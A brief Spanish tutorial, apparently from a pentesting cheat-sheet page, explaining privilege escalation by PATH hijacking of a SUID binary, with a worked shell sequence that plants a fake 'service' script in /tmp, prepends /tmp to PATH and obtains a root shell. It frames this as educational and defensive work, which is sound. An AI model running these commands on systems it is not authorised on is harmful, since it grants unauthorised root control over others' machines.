KALI
Privesc por path hijacking
Si un programa SUID, que corre como root, llama a otro comando sin poner su ruta completa, puedes engañarlo.
El sistema busca ese comando en las carpetas del PATH, en orden. Así que creas tu propio comando malicioso con ese nombre, pones tu carpeta al principio del PATH, y cuando el programa root lo llame, ejecutará el TUYO.
Es un fallo de programación clásico. Los binarios SUID nunca deben llamar comandos por nombre relativo.
# los comandos
www-data@victim:$ strings /usr/local/bin/backup | grep -E '^(tar|zip|service)$'copiarservice <- llamado sin ruta completa!
www-data@victim:$ echo -e '#!/bin/bash\n/bin/bash -p' > /tmp/service && chmod +x /tmp/servicecopiarwww-data@victim:$ export PATH=/tmp:$PATH && /usr/local/bin/backupcopiarroot@victim:# whoamicopiarroot
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.